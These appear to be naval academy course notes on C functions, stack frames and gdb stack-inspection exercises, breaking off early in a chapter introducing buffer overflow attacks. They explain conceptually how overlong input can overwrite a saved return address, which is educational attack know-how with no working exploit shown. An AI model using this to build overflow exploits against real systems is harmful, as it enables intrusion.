Functions promote the writing of good programs. If we have to solve a large problem, we successively decompose the large
problem into smaller sub-problems until the sub-problems are easy to directly implement as statements in the C programming
language. Once we have finished dividing a large problem into individual sub-problems, we write small programs – called
functions – to solve each of these individual subtasks.
1.2. User-Defined Functions C has predefined functions which we can use, but we can also write our own functions.
Functions we write ourselves are called user-defined functions. To use our own functions, we must write the code that permits
the function to perform its required task.
The Function Definition The function definition describes how the function accomplishes its task. A function definition is a
small program. When we call the function, we run this small program. The syntax is:
type_returned function_name( type_1 parameter_1 , … , type_n parameter_n )
{
body of the function
}
Here type_returned is the data type of the result returned by the function, type_1 is the data type of parameter_1, and so on
up to type_n, the data type of parameter_n.
Arguments vs. Parameters In a function call, the inputs to the function are called the arguments. These values of the arguments
are plugged in for the parameters in the function definition before the body of the function is executed.
A parameter should be thought of as a placeholder that “stands in” for an argument. The person writing the function may not
know the names chosen for the arguments, so he just picks his own parameter names that will serve to stand in for the arguments.
The return Statement The return statement consists of the keyword return followed by an expression. The value of
the expression is what is returned to the statement which called the function. In other words, the value of the expression after
the return keyword is the function’s output. The function ends when the return statement executes.
An Extended Example Suppose a person wants to write a function that calculates the absolute value of an integer. Utilizing
the if-else statement which you learned in Chapter 3, the absolute value of an integer (given the name number in the program
snippet below) can be calculated as:
if(number >= 0)
{
AV = number;
}
else
{
AV = -1 * number;
}
If we had a function named AbsVal( x ) which returns the absolute value of a given integer, x, we could write the program
as:
#include <stdio.h>
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
}
Problem: The program above will not work because there is no built-in function named AbsVal, so we’ll define one.
The following program will work:
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
}
The program above starts executing at the line of code that has the word main in it. The next line declares the variables x and
y, and since they are not initialized, they have random garbage values.
[Figure: the program listing, with the first line of main labeled "The program starts here." and the variable boxes
x = -149248 and y = 23972 labeled "Garbage values!"]
When the user is prompted to enter an integer, let's say that he enters the value -5. This value is then placed in the variable x.
[Figure: the same listing after the scanf, with x = -5 and y = 23972 (still a garbage value).]
Now we reach the line with the function call ( y = AbsVal(x); ). The program jumps to the first line of the function
named AbsVal.
[Figure: the listing with the line y = AbsVal(x); labeled "When we reach this line… we jump to the function!"; x = -5,
y = 23972.]
And the value of the argument x is plugged into the parameter number.
[Figure: the listing with a new box number = -5 inside AbsVal, labeled "A copy of the value of x (in this case -5) is placed
in the parameter named number."; main's boxes still show x = -5, y = 23972.]
Now the function declares its own variable named AV which initially has a garbage value, but is set equal to 5 in the else
branch.
[Figure: the listing with number = -5 and AV changing from the garbage value -944001 to 5, labeled "AV is changed from a
garbage value to 5."; main's boxes still show x = -5, y = 23972.]
Now, when we reach the return statement ( return AV; ), we jump back to the original function call and the value of AV
(which is 5) is placed in the variable y.
[Figure: the listing with number = -5 and AV = 5 inside AbsVal, and main's boxes now showing x = -5, y = 5.]
1.3. void functions Functions that produce no values for the rest of the program to use are called void functions. A common
example: We want a function to send a message or some output to the screen. The output is sent to the screen, but is not sent
back for use in the rest of the program.
The syntax for the function definition of a void function is then:
void function_name( type_1 parameter_1 , … , type_n parameter_n )
{
body of the function
return ;
}
The function call would be simply
function_name( argument_1, … , argument_n );
So, there are three key differences between the syntax of void functions and the syntax of other functions:
• the keyword void is used instead of a return type.
• the return statement in the function definition does not contain any expression to be returned. In fact, the
return statement can be entirely omitted.
• the function call is not used as the right side of an assignment statement.
We can rewrite our earlier example using a void function, called output, to display the result. This is shown on the
next page. The function named output replaces the printf statement that displays the absolute value.
Note the new function named output.
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
void output( int Abs_Num )
{
printf("The absolute value of the integer is %d\n" , Abs_Num);
}
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
output(y);
}
The function named output is called at the line output(y); . The value of the argument y is plugged into the parameter
Abs_Num.
1.4. The main function Would you believe that you have been using functions all along! In fact, main is a function. It is a
very special function in that all programs begin executing at the main function.
Practice Problem 6.1
Circle the appropriate words to complete the statements below. Each set of bold terms separated with a slash indicates that
you should select one of the choices.
To use a function we must invoke it with a return value / function call / prototype.
The values / parameters / arguments are the inputs to a function.
A value / parameter / argument is a placeholder that “stands in” for a value / parameter / argument.
The result from a function is called the return value / function call / prototype.
Solution:
To use a function we must invoke it with a function call.
The arguments are the inputs to a function.
A parameter is a placeholder that "stands in" for an argument.
The result from a function is called the return value.
Practice Problem 6.2
What is the primary purpose of a function in a programming language (i.e., why are they used)?
Solution:
Practice Problem 6.3
Explain the error made during the call to the addthendisplay() function below.
#include<stdio.h>
void addthendisplay( int first_num, int second_num )
{
int sum_of_num = first_num + second_num;
printf("\nThe sum of the numbers is: %d\n\n", sum_of_num);
}
int main()
{
int num1 = 27, num2 = 34, num3 = 13;
addthendisplay( num1 , num2 , num3 );
}
Solution:
The way that functions are handled by the CPU is the last piece that we need before understanding an important attack called
the buffer overflow attack. Would you believe that the way functions are handled by the CPU can, in the words of an infamous
hacker, “produce some of the most insidious data-dependent bugs known to mankind.” Put another way, these functions
intended to help us can open the door to allow your computer to be hijacked.
2. The Stack
2.1. A Program in Memory. Let’s think about what happens when a program is loaded into memory. Recall that the source
code that we write is translated into machine language instructions, and these machine language instructions are fetched,
decoded, and then executed, one-by-one.
So… you would surely agree that the program itself must reside in main memory. When the operating system executes a
program, it allocates a block of memory for the machine language code that comprises the program. This section of memory
is termed the text segment.
When the program is placed in the text segment, additional memory is given to the program to hold the values that it
needs to successfully execute (e.g., values of variables). As we have mentioned, this section is called the stack. (In the
pictures that follow we draw the stack next to the code for simplicity; in a real process the stack occupies its own region at
much higher addresses than the text segment, which is why the exercises below show code at addresses near 0x080483xx
and stack frames at addresses near 0xbffff7xx.)
2.2 The Stack during a Function Call. Let's look at an example of how the previous program would run in memory. For
this first example, we will make some simplifying assumptions:
• We'll look at source code instead of object code
• We'll assume everything (an instruction, a stored character, a stored integer, etc.) consumes one address.
So, let's suppose the program is loaded as shown below.
[Figure: the source lines of the program laid out in memory one per address, with the first line of main labeled "The program
starts here." and an empty region labeled "The stack" beside the code.]
All programs begin execution at main. So, when execution begins, the eip register (the instruction pointer) holds the address
of the next instruction to be executed: 0x080483c3
This specific instruction is fetched, decoded and executed, and the eip register is then incremented so that it points to the next
instruction. (Actually, this incrementing occurs after the fetch, but before the decode and execute.) As the program executes,
this process (fetch, increment eip, decode the fetched instruction, execute) is repeated.
Early on in the program we declare variables x and y. Space has to be allotted for these variables. This is where the stack
comes in! These variables are stored on the stack.
[Figure: the stack with space allotted for x and y.]
Also, since we are calling a function and passing a value, the argument for the function is stored in memory. Since, in this
program, we are passing the value of the variable x, the compiler will copy the value of the variable x and store it in memory.
In this program, the name of the copied value is number.
So, now our picture looks like this:
[Figure: the stack with space for x, y and number.]
Recall that two important registers, ebp and esp, are used to keep track of the location of the stack in memory.
• The stack pointer register, esp, points to the memory address at the top of the stack.
• The base pointer register, ebp, points to the memory location at the bottom (the base) of the stack; literally, the very next
address after the bottom variable.
So, our picture looks like this:
[Figure: the stack with esp and ebp marked.]
The program continues to run along, line by line, until 0x080483c8 is reached. At this point we are in trouble because we
have to jump to an instruction that is not in order. The next instruction is at memory location 0x080483b5.
Consider the difficulty the CPU now encounters:
• We go to a different function (Abs_Val) that has its own variables
• We have to know where to jump back to when the function Abs_Val is done
• We certainly don't want to lose main's variables when Abs_Val is done
So, here is what we do. Each function that is called gets its own section of the stack to work with, called its stack frame. So
the stack frame for main, at this point in time, comprises addresses
0xbffff7d7 – 0xbffff7d9
Now, we are going to give Abs_Val a stack frame for it to use for its own variables. After we are done executing the function
Abs_Val , we will go back to the main function, and it will go back to using main's own stack frame.
Now, think about this: if we are going to give Abs_Val a stack frame to play with, what information will we need to restore
the situation to the way it was before Abs_Val was called? To restore things to the way they were before, we need
• the proper return address for eip
• the prior value of the base pointer ebp
How should we "remember" these values? By placing these two items in the stack frame for the main function:
[Figure: the stack with the return address and the prior ebp added.]
Now, we can safely jump to the function Abs_Val. This function has one variable, so the stack now looks like this:
[Figure: the stack with Abs_Val's stack frame added on top.]
What happens when we reach the return statement in the function Abs_Val? At that point we restore the stack frame for
main. But… how do we do that?
Easy! We know where to reset esp (the stack pointer): in the picture above, we can reset esp to be ebp + 2.
We know what instruction address should be placed in eip: in the picture above, we place the value stored at address ebp + 1
into eip.
We know where to reset ebp (the base pointer): in the picture above, we reset ebp to the value pointed to by ebp. In this
case, ebp points to the value 0xbffff7da, so we reset ebp to point to address 0xbffff7da.
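The layout just described (saved ebp at the address ebp points to, return address one word above it, the function's own variables below) can be checked on a live process. The following program is an added example, not code from these notes. It assumes GCC or Clang, whose __builtin_frame_address and __builtin_return_address builtins it relies on (both compilers keep a frame pointer in a function that calls __builtin_frame_address), and it uses sizeof(void *) for the word size in place of the one-address-per-item simplification, so the same code runs on a 32-bit or 64-bit build. The function names inspect_frame, frame_layout_check and low_bits are made up for the example.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * With a frame pointer in use, a function's frame has this shape on 32-bit
 * x86, and the same shape (with 8-byte words) on x86-64 and AArch64:
 *
 *     [ebp + 2*w]  first stack argument (32-bit x86 calling convention)
 *     [ebp + 1*w]  return address          <- the notes' "ebp + 1"
 *     [ebp + 0]    saved caller ebp        <- "the value pointed to by ebp"
 *     [ebp - ...]  this function's locals
 *                                          <- esp
 *
 * where w = sizeof(void *).
 */

/* Low 48 bits of a pointer.  On AArch64 builds with pointer authentication the
 * saved return address carries a signature in its top bits; masking keeps the
 * comparison below meaningful there too (a no-op on x86). */
static uintptr_t low_bits(const void *p)
{
    return (uintptr_t)p & (uintptr_t)0xffffffffffffULL;
}

struct frame_view {
    void *fp;          /* this function's frame pointer (ebp / rbp / x29) */
    void *saved_fp;    /* word at [fp]:   the caller's frame pointer      */
    void *ret_addr;    /* word at [fp+w]: where execution resumes         */
    void *local_addr;  /* address of a local variable in this frame       */
};

/* noinline: the frame examined must be this function's own, not the caller's. */
__attribute__((noinline)) static struct frame_view inspect_frame(void)
{
    volatile int flag = 31337;                  /* a local, like flag in test_function */
    void **fp = (void **)__builtin_frame_address(0);
    struct frame_view v;

    v.fp = (void *)fp;
    v.saved_fp = fp[0];      /* the prior ebp was pushed here by the prologue  */
    v.ret_addr = fp[1];      /* the call instruction pushed the return address */
    v.local_addr = (void *)&flag;
    return v;
}

/* 1 if the hand-walked word at [fp+w] agrees with the compiler's own
 * __builtin_return_address(0), i.e. the picture in the notes matches reality. */
__attribute__((noinline)) static int frame_layout_check(void)
{
    void **fp = (void **)__builtin_frame_address(0);
    return low_bits(fp[1]) == low_bits(__builtin_return_address(0));
}

int main(void)
{
    struct frame_view v = inspect_frame();

    printf("frame pointer (ebp)        : %p\n", v.fp);
    printf("saved caller ebp at [ebp]  : %p\n", v.saved_fp);
    printf("return address at [ebp+%zu] : %p\n", sizeof(void *), v.ret_addr);
    printf("local 'flag' lives at      : %p (%s the frame pointer)\n", v.local_addr,
           (char *)v.local_addr < (char *)v.fp ? "below" : "above");
    printf("layout check               : %s\n",
           frame_layout_check() ? "return address found at [ebp+w]" : "MISMATCH");
    return 0;
}
```

Compile with gcc -g -O0 and run it, then open the binary in gdb and compare the printed addresses with x/xw $ebp and x/xw $ebp+4 (or $rbp and $rbp+8 on a 64-bit machine). One caveat for the 64-bit case: the exercises below store the arguments with mov DWORD PTR [esp+N] because the 32-bit convention passes them on the stack; on x86-64 the first arguments travel in registers, so the argument slots above the return address are not there unless the callee spills them.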
Practice Problem 6.4
Place the following elements in the order they will appear (from bottom to top) on the stack during a function call from main
(while executing the instructions for that function).
• Return Address
• main's Variables
• Function's Variables
• Saved value of prior ebp
• Function's Arguments
Solution:
Practice Problem 6.5
(a) Given the following source code and debugger output, construct the stack frame for the function main in the diagram
below part b. Show where the base pointer (label as EBP-Main) and stack pointer (label as ESP-Main) are pointing to, and
show where the arguments to exam_function are stored in memory.
#include<stdio.h>
void exam_function( int x, int y, int z)
{
int some_class;
int best_class;
int my_class;
best_class = x;
my_class = z;
some_class = y;
}
int main()
{
exam_function( 2005, 2003, 2015 );
}
(b) Using your answer from part a), and the additional debugger output below, construct the stack frame for the function
exam_function. Show the location of the base pointer (label as EBP-Exam) and stack pointer (label as ESP-Exam) on
the figure. Note on your figure:
• the location of best_class, some_class, and my_class
• the location of the return address
• the location of the prior value of the base pointer (EBP-Main)
Solution:
Address       Value       Description
BFFFF7E8
BFFFF7EC
BFFFF7F0
BFFFF7F4
BFFFF7F8
BFFFF7FC
BFFFF800
BFFFF804
BFFFF808
BFFFF80C
BFFFF810
BFFFF814
BFFFF818
BFFFF81C
BFFFF820
Problems
1. Consider the program below which uses a user-defined function named maximum that returns the largest of three
numbers. A screen capture of how the program should appear is also shown. Your job: Fill in the three missing
blanks!
#include<stdio.h>
float maximum(float x, float y, float z)
{
float max;
if( __________ )
{
max = x;
}
else
{
max = y;
}
if( z > max )
{
__________ ;
}
return __________ ;
}
int main()
{
float number1, number2, number3;
printf("Enter three numbers and I will tell you the largest: ");
scanf( "%f %f %f" , &number1 , &number2 , &number3 );
printf("The largest is %f \n", maximum(number1, number2, number3) );
}
2.
NOTE ABOUT THIS PROBLEM: Although this problem reads sort of like a tutorial (i.e., “type these commands,
then answer these questions”) it’s critical to note that the tutorial aspect of this problem is incomplete. That is, you’ll
need to type in additional commands at various points, beyond what’s given, in order to be able to answer the questions.
Look to Security Exercise 6 for inspiration. There are different ways to go about getting the answers to this question,
but gdb commands such as list, disass main, disass test_function, nexti, and/or x/10xb $esp
(where “10” would be replaced by the number of stack frame bytes - starting at the top of the stack - that you wish to
view) may come in handy.
Carefully enter the following C program. Note the single blank line after the declaration of buffer; it is needed so that the
line numbers used in parts (a) and (b) below match.
void test_function( int a, int b, int c, int d, int e)
{
int flag;
char buffer[ 10 ];

flag = 1234 ;
buffer[ 0 ] = 'U' ;
buffer[ 1 ] = 'S' ;
buffer[ 2 ] = 'A' ;
}
int main( )
{
test_function( 5, 6, 7, 8 , 9 ) ;
}
(a) Compile your program by entering gcc -g followed by the name of your C program (e.g.: if you named
your program hwk6.c, you would enter gcc -g hwk6.c ). Then start the debugger by entering:
gdb -q ./a.out
set dis intel
Now, we want to run the program up to the call to test_function – that is, the breakpoint should
correlate with the line that reads test_function( 5, 6, 7, 8 , 9 ), which should be 13 if the
program was entered exactly as shown above. So, enter
break 13
run
Sketch a picture of the stack frame for main, showing where the base pointer and stack pointer are pointing
to, and show where you believe the arguments to test_function will be stored in memory. Then, enter a
second breakpoint:
break test_function
continue
and identify where the arguments to the test function are actually stored in memory (i.e., where the values 5,
6, 7, 8 and 9 are stored in memory). Were you correct?
(b) Run the program up to the point of reaching the closing brace of test_function. To do this, enter:
break 10
continue
Sketch the contents of the stack frame for test_function as well as the additional memory locations
below the base pointer. Use the figure on the next page. Show the location of the base pointer and stack
pointer on your figure. Note on your sketch:
• the location of flag
• the location of buffer
• the location of the return address
• the location of the prior value of the base pointer
[Figure: blank stack diagram with an arrow marking ebp_main.]
3. Of the four choices below (a, b, c or d), select the most appropriate function definition to replace the commented line
in the program.
#include<stdio.h>
//YOUR ANSWER HERE//
{
float c_sq = a * a + b * b;
return c_sq;
}
int main()
{
float answer;
answer = hypot( 7.12 , 6.37);
printf("The square of the hypotenuse is: %f\n", answer);
}
(a) float hypot(float a, float b, float c)
(b) float hypot(int a, int b)
(c) void hypot(float a, float b)
(d) float hypot(float a, float b)
4. Sketch the contents of the stack frame for main under the column labeled Data in hexadecimal. Locate and label the
base pointer as ebp_main and the stack pointer as esp_main under Stack Frame Info. Locate and label the
variables g, fox[0], fox[1] under What is Represented. (Note: Not every block in the table will be filled in.)
#include<stdio.h>
int main()
{
char fox[2];
fox[0] = 'B';
fox[1] = 0;
int g = 17;
}
Address:        Data:        What is Represented:        Stack Frame Info:
0xBFFFF810
0xBFFFF811
0xBFFFF812
0xBFFFF813
0xBFFFF814
0xBFFFF815
0xBFFFF816
0xBFFFF817
0xBFFFF818
Security Exercise 6
Part 1. Initial Setup
Today you will use the program sx6.c which has been written for you and placed in the ec310code directory.
Copy this file to the work directory by carefully entering the following at the home directory prompt (make sure you are at
your home directory!):
midshipman@EC310:~ $ cp ec310code/sx6.c work
[Figure: a speech bubble reading "If you fear making anyone mad, then you ultimately probe for the lowest common
denominator of human achievement. And, by the way, who am I?"]
Verify that you have sx6.c in your work directory by changing to the work
directory:
cd work
and then listing the files in the work directory:
ls
If you do not have sx6.c in your work directory STOP and ask your instructor
or lab tech for help. Otherwise, proceed to Part 2.
Part 2. Our Program for Today
Look at the program sx6.c using nano. The program sx6.c is shown below. (Note the blank line after the declaration of
buffer: the line numbers used in Parts 4 and 5 of this exercise count it.)
void test_function( int a, int b, int c, int d)
{
int flag;
char buffer[ 10 ];

flag = 31337;
buffer[ 0 ] = 'A' ;
}
int main( )
{
test_function( 1, 2, 3, 4 ) ;
}
Note that to make this first exploration of the stack as simple as possible, we did NOT include the line
#include<stdio.h>
in our program.12
This is okay, since we do not use any input (scanf) or output (printf) statements.
Note that this program produces no output. It truly is a useless program… but it's simple enough to explore the stack for the
first time.
Question 1:
How many functions are in the program?
12 This program is a very slightly modified version of the program named stack_example.c from page 71 of the Erickson text. We have modified the
layout of the braces to the form we are familiar with.
Save your program ( Control-o ) and exit nano ( Control-x ) and then compile your program using
gcc -g sx6.c
and then run your program
./a.out
to confirm it executes without errors. (The program does not produce any output—you are just making sure you do not get any
error messages.) If your program is not working STOP and ask your instructor for help. Otherwise, proceed to Part 3.
Part 3. The Two Functions in Memory
Question 2:
Note that the function named test_function is passed four arguments: 1, 2, 3 and 4. How
much memory (in bytes) does each of these four arguments need?
Question 3:
How much memory (in bytes) is needed to store test_function ‘s flag variable?
Question 4:
How much memory (in bytes) is needed to store test_function ‘s array named buffer?
Let's examine how the main function is stored in memory. Enter:
gdb -q ./a.out
set dis intel
disass main
You should see this:
[Figure: gdb disassembly of main.]
Recall that the assembly language code above corresponds to the main function, repeated below:
int main( )
{
test_function( 1, 2, 3, 4 ) ;
}
Question 5:
Where in main memory is the first instruction that starts the main function?
Now let's examine how the function named test_function is stored in memory. Enter:
disass test_function
You should see this:
[Figure: gdb disassembly of test_function.]
Question 6:
Where in main memory is the first instruction that starts the function named test_function?
So…what’s really going on? To answer this, we will look at the stack frame for each of our two functions. Onward to Part 4!
Part 4. The Stack Frame for main
Let's set a breakpoint in main right before the call to test_function. Enter the following commands:
list main
break 11
run
Line 11 is the line test_function( 1, 2, 3, 4 ) ; . So, the command break 11 followed by run will run our program to the point
of this line (but not including this line!). That means that our program will pause right before the call to the function named
test_function.
You should see:
[Figure: gdb output after the breakpoint at line 11 is hit.]
Question 7:
What address is stored in the instruction pointer (i.e., the eip register)?
Go back to the assembly code for main (shown on the preceding page).
Question 8. Based on your answer to question 7, what is the assembly language instruction that the instruction pointer
is pointing to? Is this still in the main function?
So, let's start looking at the stack! Recall that the stack is the area in main memory that the program has available to store any
values that it needs for successful execution (such as variables, arguments, important addresses, etc.). The active part of the
stack is bounded by the two registers esp and ebp.
Question 9:
What are the addresses stored in the stack pointer (esp) and the base pointer (ebp) ?
Question 10.
Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must
remember that these values are in hexadecimal! Recall that esp points to the first address in the
stack frame and ebp points to the first address after the stack frame. Thus, subtracting the address
pointed to by esp from the address pointed to by ebp provides the number of bytes in the stack
frame.)
Question 11:
In the picture of memory shown on your answer sheet, note that the base pointer points to the bottom
of the stack.
• Fill in the addresses next to each byte (for ease, you may, if you wish, label only the last
four hexadecimal digits of each address).
• Indicate on the diagram where the stack pointer is pointing to.
Now, looking at where the instruction pointer is pointing to, the next four instructions that should be executed are (but don't
actually execute these just yet):
mov DWORD PTR [esp+12],0x4
mov DWORD PTR [esp+8],0x3
mov DWORD PTR [esp+4],0x2
mov DWORD PTR [esp],0x1
In English, the first of these instructions says:
Place the value 4 in the memory location given by esp + 12 (i.e., the stack pointer + 12). Note that the 12 in this
case is given in base-10.
Similarly, the second of these instructions says:
Place the value 3 in the memory location given by esp + 8 (i.e., the stack pointer + 8). Note that the 8 in this case is
given in base-10.
Question 12:
Modify the diagram shown in Question 11 to show what the stack should look like after these four
instructions are executed. Remember that an integer (such as 4) takes up four bytes.
Enter
nexti
four times to execute these four assembly language instructions. Now, examine the stack to see if the picture you drew in
Question 12 is correct.
Examine the stack? How do we do that?
Well, to examine the word stored at the address contained in the stack pointer, we can enter:
x/xw $esp
To examine the word stored at the address four bytes later, we can enter:
x/xw $esp + 4
And so forth. As an alternative, you could use x/xw followed by the address you want to examine. For instance, to examine
the word that is stored at the address 0xbffff80c I would enter: x/xw 0xbffff80c.
Show your instructor your answer to Questions 11-12. If you are on the right track, you will be told to move on to Part 5!
Part 5. The Stack Frame for test_function
So, we will soon jump to the function named test_function. As we discussed in lecture, this will establish a new stack
frame. After the function named test_function is done, we have to be able to return to main's stack frame. To return
to the main function, main must save on the stack:
• The proper return address for eip
• The prior value of the base pointer ebp
Let's first establish what these values should be.
Question 13:
What is the old (prior) value of the base pointer that must be saved on the stack?
Look carefully at the assembly language code for main shown back in Part 3 of this Security Exercise.
Question 14:
What is the value of the return address that we must save, so that the instruction pointer can be reset
back to the correct line of code after the function call to test_function is complete?
Let's jump into the function named test_function.
Enter:
list test_function
break 8
continue
You should see:
[Figure: gdb output after the breakpoint at line 8 is hit.]
Notice that by inserting a breakpoint at line 8, we are within (but at the end of) test_function.
Question 15:
What address is stored in the instruction pointer (i.e., the eip register)?
Question 16.
Based on your answer to Question 15, what is the assembly language instruction that the instruction
pointer is pointing to (i.e., the next instruction that will execute, but has not yet executed)?
Question 17:
What are the addresses stored in the stack pointer (esp) and the base pointer (ebp) ?
Question 18.
Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must
remember that these values are in hexadecimal!)
Show your instructor your answer to Questions 17-18. If you are on the right track, you will be told to move on to Part 6!
Part 6: Do you have the skills of a hacker?
Now you will be put to the test! Have you developed hacking skills? Let’s see!
Question 19:
Using all the skills you have learned so far, attempt to determine the contents of the stack frame for
test_function as well as the additional memory locations below the base pointer. Fill in your
answers on the picture for Question 19. The arrow on the figure shows where you should place the
base pointer (ebp). All other info should be based upon anchoring the base pointer at the location
shown. Specifically:
• Show the address for each byte (last four hex digits)
• Where is flag? (Hint: convert the value to hexadecimal)
• Where is buffer? (Hint: You should hunt for buffer[0] )
• Where is the return address (see your answer to Question 14)?
• Where is the old value of the base pointer (see your answer to Question 13)?
Security Exercise 6 Answer Sheet
Name: __________________
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11 and Question 12:
Address
Value stored
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Question 18:
Question 19 is on the next page.
Address
Value stored
Chapter 7: The Buffer Overflow
Objectives:
(a) Describe the buffer overflow attack, determine what features of C make it possible, and identify who is responsible for
memory management in C.
(b) Demonstrate the ability to craft simple buffer overflow exploits
(c) Explain how specific buffer overflow attacks work by describing stack operations.
(d) Analyze programs that submit input via the command line.
1. The Buffer Overflow Attack
1.1. Introduction The very first major attack on DoD computer networks took place in February of 1998 and lasted for over
a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4 Navy sites, gaining
access to logistical, administrative and accounting records. The method used in this early attack—a buffer overflow—has been
used countless times ever since. Many famous attacks—the Morris Worm, the Code Red Worm, the SQL Slammer Worm, the
Twilight Hack, Blaster, Conficker—used the buffer overflow as a primary attack vector. The recent Stuxnet worm used the
buffer overflow as one of many attack vectors.
The buffer overflow attack is still exceedingly common. An examination of a two-week period in early January 2014 proves
the point. On January 3, 2014, the SANS Institute reported a newly discovered buffer overflow attack against the ubiquitous
Linksys router. On January 9, 2014 a buffer overflow exploit was discovered in the “X Window” system that underpins many
Linux desktops—although discovered in January 2014 this bug was waiting around to be discovered for the previous 22 years!
On January 15, 2014, a penetration testing firm announced the discovery of a zero-day flaw for executing a buffer overflow
attack on a common SCADA system used in the US, the UK and Australia. A security researcher described the potential
ramifications of this latter attack as “the stuff of modern-day nightmares.”
To be sure, the buffer overflow attack is not the only way to cripple a computer system. There are many other ways to attack,
such as cross-site scripting, SQL injection, format string errors, and on and on. You may have learned in SI110 that the
Department of Homeland Security worked together with the SANS Institute, Apple and Oracle back in 2011 to develop a list
of the top 25 software vulnerabilities, and the “classic buffer overflow” came in third, behind SQL injection and OS command
injection (cross-site scripting was 4th). The buffer overflow was the top vulnerability from 2000 through 2005, and has bounced
around the top three spots ever since.
In February 2013, the security firm Sourcefire surveyed Common Vulnerability Scoring System (CVSS) data from 1988 to
2012, and found that buffer overflows were the most-often reported vulnerability. Of the vulnerabilities assigned a category
of “high severity”, buffer overflows comprised over a third of the total. Security analyst Paul Roberts notes that “the stubborn
staying power of buffer overflows for more than two decades – despite gallons of industry ink spilled on the problem – is
dispiriting and has to get us thinking about what it is we’re doing wrong as an industry.”
1.2. In a Nutshell. The simple basis for the attack can be appreciated by examining the following section of C code:
int k = 1000 ;
char my_stuff[ 512 ] ;
my_stuff[ k ] = 'A';
What happens if this code is executed? This array is only allotted 512 bytes; i.e., this array holds character variables
my_stuff[0] through my_stuff[511]. The programmer who wrote the third line of code seems unaware that the last
element of the array is my_stuff[511], since this third line of code assigns a value to the non-existent variable named
my_stuff[1000]. When this code is executed, a byte of memory 488 bytes beyond the end of the array will be overwritten
with the character 'A'.
This error will not be caught at compile-time. In a nutshell, the problem is that C compilers do not check for going beyond the
bounds of an array.
This is a big concern because almost all major operating systems are written in C. Additionally, many popular applications are
written in C.
You might be wondering: What exactly happens when the code above is run? The unfortunate answer is: Who knows? Perhaps
nothing noticeable will occur. Perhaps disaster will occur.
Practice Problem 7.1
What feature of the C language makes a buffer overflow attack possible?
Solution:
1.3. Back to the Stack Recall that when a program is to be executed, the operating system reserves a block of main memory
for it.
The “text” segment holds the actual program (the machine language instructions which we can view as assembly-language
instructions.) The memory allotted to the program in the text section does not change; it does not shrink or grow, since the
program does not shrink or grow while it is being executed.
The “stack” is the memory that the program has available to store information during execution. For example, the program’s
variables are stored on the stack.
Let’s look at the program on the right, and examine the stack as it executes.
The program begins at the main function, and the variables that are used by the main function are placed on the stack. When
the instruction pointer is at the location shown below on the right, the stack appears as on the left.
Recall that we keep track of the stack using the base pointer (ebp) which points to the bottom of the stack (specifically the
memory location immediately following the bottom of the stack) and the stack pointer (esp) which points to the top of the
stack. Each function gets to place its variables on the stack. The part of the stack that belongs to a function is called that
function’s stack frame. So, the picture above depicts the current stack frame for the main function.
Now, the next instruction has us call the function named happy_times. The values of the arguments are placed on the stack
in preparation for the function call. The stack, before the function call, now looks like this:
The function happy_times also has a variable (the array named alpha_code) and it needs to be allotted its own (separate)
stack frame. But after happy_times are over,[13] we will jump back to the main function. So, we still need to keep the stack
frame for main undisturbed. Additionally, after happy_times are over, we need to resume program execution at the correct
point (i.e., the point in main where we left off when we reached the function call).
[13] Of course happy times are never over at USNA….
So… what do we do?
We place the return address for the next instruction after the function call on the stack, and the old value of the base pointer on
the stack, then we allot space for happy_times’ variable as shown below.
An Aside: Recall from last lecture that in a function call from main to another function, the stack will be organized as shown
in the accompanying figure. Note that our example conforms to this organization, as it must.
Now, suppose that the function happy_times , as part of its code (shown as “more code” above), prompts the midshipman
to enter his alpha code. The function happy_times uses the character array named alpha_code to hold the value that the
midshipman types in. We have seven bytes reserved on the stack for the alpha number (remember, we need the NULL
terminator).
If all works well, all well and good. And everything always works well at USNA. Right?
Of course not!
Our midshipman was sleepy, and when he was prompted to enter his alpha code (which happens to be 151234) he dozed off
for a micro-nap and accidentally entered:
1512344444444444444444444
<enter>
He entered a total of 25 characters. Think about this. What happens?
When the 25 characters are fed into the array alpha_code, the typed-in characters beyond the seventh will start overwriting
memory!
It may be the case that the alpha code overwrites the return address.
Suppose this occurs. What will happen when function happy_times is finished executing? If the return address was indeed
overwritten, then the return address will consist of some of the characters that were in the midst of the alpha string that was
entered.
What will happen then? The instruction pointer will jump to some spurious address. And then... the program will most likely
crash with a segmentation fault. A segmentation fault occurs when a program attempts to access memory outside the region
of main memory that it has been allotted.
This sequence of events, if done intentionally, is called a buffer overflow attack or a stack smashing attack!!!
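The safe counterpart to the alpha_code read in the story above, added here as an example (it is not code from the notes or from the course's happy_times program): the entry is accepted only if it fits in the seven-byte array, and an over-long line is discarded rather than written past the end of the array. The function names, the use of fgets and tmpfile, and the sample entries are assumptions of this example.

```c
/* Added example (not from the notes): the alpha-code read from the
 * happy_times story, done so that a long entry cannot run past the end of
 * the array.  The function names, the stdin handling and the sample inputs
 * are constructed for this example. */
#include <stdio.h>
#include <string.h>

#define ALPHA_CODE_SIZE 7   /* six characters plus the NUL terminator, as in the notes */

/* Copy `typed` into dst[dst_size] only if it fits, terminator included.
 * Returns 0 on success and -1, leaving dst untouched, when the entry would
 * overflow; scanf("%s") has no such check and simply keeps writing. */
int store_alpha_code(char *dst, size_t dst_size, const char *typed)
{
    size_t len = strlen(typed);

    if (dst_size == 0 || len >= dst_size)
        return -1;                    /* len == dst_size would lose the NUL */
    memcpy(dst, typed, len + 1);      /* len + 1 copies the terminator too */
    return 0;
}

/* Read one line of keyboard input into dst with the same guarantee.
 * fgets never stores more than dst_size - 1 characters; the rest of an
 * over-long line is discarded so it cannot leak into the next prompt. */
int read_alpha_code(char *dst, size_t dst_size, FILE *in)
{
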